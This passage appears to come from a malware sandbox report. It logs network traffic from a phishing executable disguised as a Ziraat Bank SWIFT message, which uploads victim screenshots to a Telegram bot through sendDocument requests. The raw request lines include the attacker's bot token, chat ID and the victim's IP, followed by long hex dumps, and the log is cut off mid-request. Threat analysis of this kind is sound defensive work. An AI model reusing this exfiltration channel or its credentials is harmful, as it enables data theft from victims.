81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1
                                                                        Data Ascii: ~m%9OPI;@q@J^{b.~:K,su2G!y#@"8{79@!Or,t*|&7`?Aou\CB,#X{^#3J7^`td|XxK$P9s\c4[o? Dosj
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: bf 9f 23 fc ae 5e 30 f3 bb 1a d5 01 c8 fe 9c e3 f3 ba 47 e7 df 8f 11 89 bd 96 21 f2 0f 5c e2 2d 84 5a cc 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa
                                                                        Data Ascii: #^0G!\-ZOH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s|ap8.(.Vs:oC|U,F@+#$%@PRpH<;_'zM^sIAC"
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: 80 c4 26 bf f4 57 b5 65 bd f9 c8 40 05 a0 72 4d b9 87 58 03 c5 9d 22 0e e9 d6 8a 3e f3 cc 65 1f f3 21 0a 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88
                                                                        Data Ascii: &We@rMX">e!;celq|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&I
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: a2 85 12 70 ba ca 6e 76 ac 07 41 37 dd 66 3f 67 a4 cf dd 4d e2 f3 a7 e1 bd 23 1c fd b5 f5 e8 70 7b 64 f8 e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c
                                                                        Data Ascii: pnvA7f?gM#p{d6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_|w7OUeMwPX7-],EvQ.%;:lv'v*_~*
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: 19 08 e7 1c 3b 01 b8 17 12 30 93 7e 91 28 f0 22 13 05 5d 32 37 0b d7 8c 2c 21 00 b9 bd 77 1e 99 f4 8b 64 d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c
                                                                        Data Ascii: ;0~("]27,!wd/IcI*Uy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x|x{Qe =`{ V!y
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: 0f 21 e8 91 04 54 a5 a0 aa 05 8b 00 9c da c2 4d c1 3d 90 7d 48 bf ba 2a 70 f6 72 e2 cd cd c2 d3 5b 6d 9d 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55
                                                                        Data Ascii: !TM=}H*pr[m"]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: be ba b8 b9 44 a4 5b 6e 0c 6e 2b 00 87 08 40 dd 16 bc 54 09 f8 7c 14 80 d3 67 d9 f7 53 a8 e7 56 05 60 3f d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d
                                                                        Data Ascii: D[nn+@T|gSV`?{GEpR#i7Id_,Uj=[6b|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}
                                                                        2024-12-12 20:39:42 UTC16355OUTData Raw: d7 cb 3f e2 ad 10 ac 85 9f 13 82 99 22 00 6b 54 e5 87 d4 53 95 1f 78 01 48 d5 9f 8e 09 93 c3 3a bd 03 50 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28
                                                                        Data Ascii: ?"kTSxH:P3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq|4h!hy#k(
                                                                        2024-12-12 20:39:43 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:43 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.549864149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:46 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0 [TRUNCATED]
                                                                        Content-Type: multipart/form-data; boundary================8dd1e4fdc10329c
                                                                        Host: api.telegram.org
                                                                        Content-Length: 667943
                                                                        Connection: Keep-Alive
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 34 66 64 63 31 30 33 32 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70
                                                                        Data Ascii: --===============8dd1e4fdc10329cContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAap
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 99 4b 3f 1e 15 8e 79 88 be f8 2e 40 f2 cc 45 fc 95 a3 c2 7f 78 66 91 7c 88 3c de e7 e7 d1 5f 20 ce 51 df 8d 7c a6 1c b7 2a 50 01 c8 3c ed 40 00 6e be 04 5c 94 59 47 9c 71 67 5b f0 2d c7 16 10 80 e5 06 e0 f0 d9 46 d2 92 7a 91 d6 9a 29 72 ec 95 97 57 02 d0 ea 3f e4 df 49 29 dd 71 42 fa 97 7b 2f 6e 0a 29 04 e0 ad df fd 76 ba ef 9e 3b 87 e4 1f 0c 09 c0 cc 8f 4f 7e 4f ba e0 cf fe 7a 30 bf 52 01 38 7f e2 83 4b 62 2d 69 37 4d 5a f2 6e 1a b4 be c3 49 d8 12 02 b0 29 e5 b6 26 0d 69 37 4d 5a d2 6f 9a b4 a4 df 34 69 4a c0 c0 fc db c6 b3 f0 f6 1f 14 e8 2f 91 77 8d d8 a4 cc bf 25 ef 3d 86 b9 e3 f2 33 a6 48 ef cd 77 4f c4 fc 0a 59 c8 7b b7 62 73 c7 e6 7f 4f 8d 61 fe 98 95 33 f7 a6 bb 96 d0 92 7c e3 68 c9 bd 51 f4 de 70 c7 a0 ff 68 13 80 9b 8b e2 10 b6 66 05 60 8b 71 02
                                                                        Data Ascii: K?y.@Exf|<_ Q|*P<@n\YGqg[-Fz)rW?I)qB{/n)v;O~Oz0R8Kb-i7MZnI)&i7MZo4iJ/w%=3HwOY{bsOa3|hQphf`q
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 5a f2 95 77 4a 3b e3 11 f7 a1 af 54 74 0f fb 0a bf 48 59 bf 43 5e 8f 80 cb 6c 40 c8 75 ef 04 04 e6 a8 fa 53 f6 79 cc 97 be 55 7e 1b f9 d9 72 2c 8a 41 aa 01 7b 4f 3a a3 b4 56 f3 01 fd 78 21 08 31 fa f1 d2 0f 6f 05 9e 7f d2 59 69 ee 8f f2 3e 73 1f 7c 28 ad 06 24 e1 28 90 80 b6 ff fb 29 df 4b 87 7d e4 ea f4 b6 53 3f 9d 3e f2 91 8f a4 0f 7f f8 c3 e9 53 9f fe c7 74 ce b9 e7 a5 2b ae 5a 2a 03 47 09 c0 53 3e f6 c9 f4 9e 13 4f 4e c7 1e f7 d6 f4 ea 57 bf ba 88 bf e7 fd dd 5b d2 1f bd f5 ec d4 3b f9 c1 d4 fb c0 8f 87 79 ff 43 6d 9c ef 44 56 2d e5 0a 1c 73 6d cc 47 14 89 9b 8b fb fc ca 87 6e 4d 57 5f ff de c5 ea bf 6f 1f 9d 79 43 fa f9 77 df 35 24 f6 6e fe c1 8f d2 3f 5e 74 45 3a e5 f3 17 a6 eb af bf 3e 3d f4 d0 8f 8a 9c aa 05 e0 19 1f fc 44 fa ca eb 5e 93 be fc fc
                                                                        Data Ascii: ZwJ;TtHYC^l@uSyU~r,A{O:Vx!1oYi>s|($()K}S?>St+Z*GS>ONW[;yCmDV-smGnMW_oyCw5$n?^tE:>=D^
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 15 a0 b2 0e 79 67 a5 5f 14 79 88 3f de fb 47 df 0b 43 6c 99 33 bf c6 f5 0a c0 8d 87 e4 cf 79 50 fe 59 3a 59 17 85 5d 14 79 35 e6 20 ef 10 79 8a c4 48 9d 0b ec 3f 78 ef 5f 9e b3 1d 54 fa e5 39 db b9 bd 2e 2a 62 b0 1c 07 ee 2a f6 10 7a 1c fd 55 ec 11 53 e8 99 e3 18 d9 17 c7 51 1c 02 f3 08 3f a5 1f 6d 5d 0d a8 d4 53 f4 29 f3 88 39 17 e7 69 fb 95 7d fd f9 28 00 cd 1d 86 3d fa 0c a4 5f 00 29 a7 b8 43 ca d5 d2 0e 10 7e c8 3a e5 1d 6b c0 39 d7 99 cf 5e e6 d5 63 29 52 71 c7 f3 86 64 9a e2 0d ac ca 33 ee 98 7c a5 1d 17 78 20 ec 5c 43 df 71 5c 1b f1 59 51 e4 d5 73 71 3c 6e 0d cf 88 02 90 be 42 8f b1 e2 ae 35 af a4 b3 0f e6 d4 17 8a d0 8a 7b 19 a7 4a 90 b5 0a c0 f8 3c 88 47 7c e9 d7 63 8f 08 8f 12 80 1c 01 8e 82 0f 90 78 8c c1 23 c2 8e 95 7c be 03 d0 6a 3f fa 71 2d
                                                                        Data Ascii: yg_y?GCl3yPY:Y]y5 yH?x_T9.*b*zUSQ?m]S)9i}(=_)C~:k9^c)Rqd3|x \Cq\YQsq<nB5{J<G|cx#|j?q-
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 49 15 e2 8b be d4 57 cd 29 d2 1c 2b dc 68 6b 44 59 07 4a 37 e3 ec 11 5f e4 75 af b8 ae 8c fb d9 b5 f9 88 b9 56 02 9a 17 f7 9a 26 00 15 7f 65 15 20 b9 dc f5 c7 3a 63 f4 3d f6 6b ae 12 70 2e 00 97 a1 17 47 41 26 8d 50 95 5a 2b 27 ef 1d 85 5a f8 bc 1a d5 ef 30 03 b5 3d a7 12 bf 5b 8d 7d 2c 00 d9 a3 94 7f 30 fd 67 ef be 7b 22 de 21 d8 df 1b 18 c8 71 e7 3b 29 18 2b 00 ad 0e dc 7e 05 ed ee ee fe 40 84 20 8f 89 a4 3d 8a df cf 98 18 4c 6d 4d ea cd 42 4d fc 49 4d d4 6d 14 35 c1 b7 1c 35 a9 37 0b 35 a9 37 0b 35 b9 b7 12 6a 82 6e a3 99 0b c0 14 ab 48 b9 bd c9 5c 00 a6 f5 eb 48 4d e6 ad 86 9a fc 83 9a d4 9b 85 9a ec ab 51 93 7a b3 50 93 7f 50 93 7c d3 18 56 84 5f c9 5c 00 ce 99 33 db 1d 80 f4 ad fa eb e5 1f 30 ee 28 e5 1f 20 00 ad f6 63 4e 21 68 3e 52 2f 12 45 a0 d2
                                                                        Data Ascii: IW)+hkDYJ7_uV&e :c=kp.GA&PZ+'Z0=[},0g{"!q;)+~@ =LmMBMIMm557575jnH\HMQzPP|V_\30( cN!h>R/E
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 00 d2 92 a7 fc 73 ce 7e 3c 3e ec 1e e4 9a 63 9e 71 c5 63 29 ff 94 82 0a 42 c7 4a 38 25 9e a2 ce 2a 3f 45 5d 9c b3 55 d6 19 2b 45 9e 15 7d cc 29 1e ed b3 a6 46 bf ee 80 ab b3 bc 53 d8 d1 46 d1 17 85 5f 29 00 63 bf b6 9e b1 b2 4d 51 27 48 3c e4 1c 2d f3 b1 f2 cf 18 d5 81 b1 1a 90 75 ec 17 21 a6 f0 23 af 8c c5 35 cc 9b 63 5e 29 e8 c0 17 7e 99 8b 72 cf 79 e2 ae 23 37 be 08 4c 5c c1 c7 38 e2 3e 71 5c 8a bc 12 e5 da 24 94 72 e4 c6 38 55 7e 3c fa 41 ab 98 2b 25 1e 79 ac 2b f7 20 1f a2 80 64 8e 35 b4 91 da 5c ee 73 c7 df 73 3f 3f 72 f4 b7 bf ff 2f f5 39 fe cb 31 e0 4d 21 00 bd 03 90 7b ff be f1 9b 6f c9 7d fe aa e5 ae 85 a7 8f 00 bc ac 69 ee b9 24 b5 57 36 cd fd 9f ed 5f 04 6e ef 01 6c ab 00 1f cd c7 80 db c7 40 a8 02 7c 82 2a c0 5e 00 fe 7e b3 e7 fb 4b f7 00 d6
                                                                        Data Ascii: s~<>cqc)BJ8%*?E]U+E})FSF_)cMQ'H<-u!#5c^)~ry#7L\8>q\$r8U~<A+%y+ d5\ss??r/91M!{o}i$W6_nl@|*^~K
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 6e 2b 0b db d6 cf 8c b4 e2 b1 fd ee 08 3b e4 1d 32 cf 57 80 a3 c4 8b a2 4f f9 c7 3c d0 67 6d 8c 21 fd d8 c7 dc 28 e1 90 72 c8 35 05 1f 73 f4 cd 51 ec ad 54 00 82 31 88 79 e6 c4 5c fa cc bb bf 6b 62 ae f3 08 40 1e ff e0 d1 0f a0 1a 90 98 f0 0a f0 ce f4 fb 5f 95 00 a4 f2 0f b1 f7 e8 a3 8f 36 df f8 9b bb 9b e7 fd fa c7 9b 7f 73 f2 65 63 fc f2 97 bf cc 79 7f fe a9 4f 55 85 dc de e4 9d ff c3 3f 6b 06 7f 70 55 fa 43 e3 92 00 84 85 2b d2 1f 9e a7 10 73 6b 0c 2e 7d 7c 4d d4 ab ff 4e 6b 9a 1f 26 52 6c 39 01 f8 c8 2c 02 f0 bc f4 07 9e 0b d2 1f 02 2f 4c 7f a8 ee 44 60 5d ea cd c2 23 33 53 93 7f 50 cb 8d 7c e8 c3 1f 5e b1 00 1c e5 d1 f4 cf 62 5d ee ad 84 2c 00 df f6 f6 a7 85 00 9c 65 2d d4 24 de 5a a8 4a ba 8d e4 02 c4 5b 90 62 79 bc c4 92 8c ab c9 be 69 c4 b5 e9 f7
                                                                        Data Ascii: n+;2WO<gm!(r5sQT1y\kb@_6secyOU?kpUC+sk.}|MNk&Rl9,/LD`]#3SP|^b],e-$ZJ[byi
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 21 b7 88 f7 01 d6 a2 2e cb 3f a8 05 a0 24 a0 97 88 8c 11 7e 88 3f 44 60 6b ef cb 1b 09 28 10 7e 5e fa 69 0c a5 00 94 ec 43 ee 49 f0 35 a8 5a cf e6 15 93 f4 6b 24 21 73 ae b2 af 14 80 59 e0 b9 79 a4 9e e6 14 f7 b1 12 d6 eb f8 af 04 9f 17 7d 59 f0 21 f7 6a ca 0a c1 bc 96 7c e6 2c de d9 e5 e2 0c 7d 62 cc 35 47 84 6b 01 d8 08 3d eb eb 48 30 c7 80 41 71 09 c0 45 7b d8 77 6e fd 2c 08 0d 84 1d 32 8f e3 be 12 81 88 3c 1d ff f5 02 d0 1f 09 26 e6 8f ff 12 87 6a cf 8b 33 5e 02 02 82 4f ef f9 53 ab 6a 40 de 1b 08 f9 88 30 b2 6d c7 4b b2 d4 03 2f f4 10 7f 54 fb 21 fe 38 06 ac 5c c6 54 ff f9 aa 3f ad 01 09 40 40 f4 45 12 0f d4 e7 08 30 7d 55 fa 29 0f 31 48 cb 7a 50 be df 4f 62 ae ac dc 2b 05 a0 97 83 92 78 b4 8a 69 9d aa fb 18 fb f5 1e e5 e7 35 b5 bc 93 b0 2b 91 d4 93
                                                                        Data Ascii: !.?$~?D`k(~^iCI5Zk$!sYy}Y!j|,}b5Gk=H0AqE{wn,2<&j3^OSj@0mK/T!8\T?@@E0}U)1HzPOb+xi5+
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 7f 30 94 7b 83 10 c9 be 88 48 fa 4d 85 48 fa 75 11 49 c3 41 28 84 df 54 98 4d 01 28 f9 b7 d7 61 ef 4b 3b ef 7b 70 98 33 cf 3c eb 03 59 00 6e 72 74 ea 6c 7d 5a 25 00 0f bb 36 8d 50 d5 87 d0 9b 22 0b 8e bc a3 91 7a 92 81 1e e6 41 63 2f 01 ab 35 c8 c0 4a 00 d2 47 00 ea e2 0f 44 a0 97 7f 59 06 1e 5a dd e2 8b c4 d3 cd be 5e f8 49 f2 a9 c2 af 14 7e 3e 07 16 71 44 98 79 03 e1 d7 3a e8 67 59 fa 2d b0 1c 2f 01 91 7c 1e 09 40 09 41 51 ca 3f 89 41 6e fd 6d 6e fe ad 61 bc e8 d0 1b b3 e8 43 fc 01 42 50 52 50 ef 00 14 a5 08 44 f2 49 fe f9 79 cd 75 0e b8 ba 89 73 b4 17 61 27 99 27 a1 47 ab 77 ff 71 ec 17 b1 b7 d8 9e 9f e3 c0 fe 3d 80 12 7e 20 51 48 cc df fe 2b 24 fe c0 8f bd 08 94 04 44 f0 f9 0a 3f da c5 fb 5f 9b 5b 7f fc 97 a3 c1 42 12 10 51 88 dc 93 d4 53 55 9f 17 82
                                                                        Data Ascii: 0{HMHuIA(TM(aK;{p3<Ynrtl}Z%6P"zAc/5JGDYZ^I~>qDy:gY-/|@AQ?AnmnaCBPRPDIyusa''Gwq=~ QH+$D?_[BQSU
                                                                        2024-12-12 20:39:46 UTC16355OUTData Raw: 07 25 f9 04 31 e5 f8 b1 8f 79 f1 27 e9 e7 65 9e af f8 2b e7 7d 45 20 b2 af 7c 07 60 de 63 ff 4a 02 aa c2 0f c9 e7 8f fe 12 03 62 ed 3d 2f 4b 3a 02 ec 05 a0 24 1f 55 7e 92 7c 1a 33 37 b6 df 75 59 10 6a 5e 63 de 09 28 d9 e7 2b fb 24 05 fb 09 40 f5 75 81 87 24 9f fa e0 8f 00 d3 72 b9 07 78 d9 e7 fb 9a d7 25 20 40 a5 1f 22 af b3 d3 a5 55 d5 df 2e f5 b1 e0 b7 76 57 01 22 f4 68 91 7d 92 80 92 7f b4 ec a1 6a 42 c6 8d 08 a4 8a af 3e ee ab 23 be c8 3d 55 fd 21 fb 98 a3 12 50 92 90 1c 1d 03 96 c8 93 d4 f3 63 e0 88 30 12 50 95 7e 54 f6 49 ea d1 f7 b9 e5 7a ad 61 ec c5 9d 17 80 6a 7d 5f f2 8f 96 a3 c0 c4 22 01 08 3a d2 eb c5 5e 7b cb 0b b3 ec a3 da 8f b1 72 24 06 89 69 3e 57 01 be a5 c2 57 fe 95 b1 72 8e 3e 02 50 c2 4e a2 0e bc fc 43 f4 71 cc 57 d2 4f 72 8f 96 f9 52
                                                                        Data Ascii: %1y'e+}E |`cJb=/K:$U~|37uYj^c(+$@u$rx% @"U.vW"h}jB>#=U!Pc0P~TIzaj}_":^{r$i>WWr>PNCqWOrR
                                                                        2024-12-12 20:39:48 UTC389INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Thu, 12 Dec 2024 20:39:48 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 1814
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.549877149.154.167.220443768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-12 20:39:51 UTC2114OUTPOST /bot7553624894:AAGTJv4BkRj8lx4-LF3RVSC0dG1iGleV1FU/sendDocument?chat_id=8064644982&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%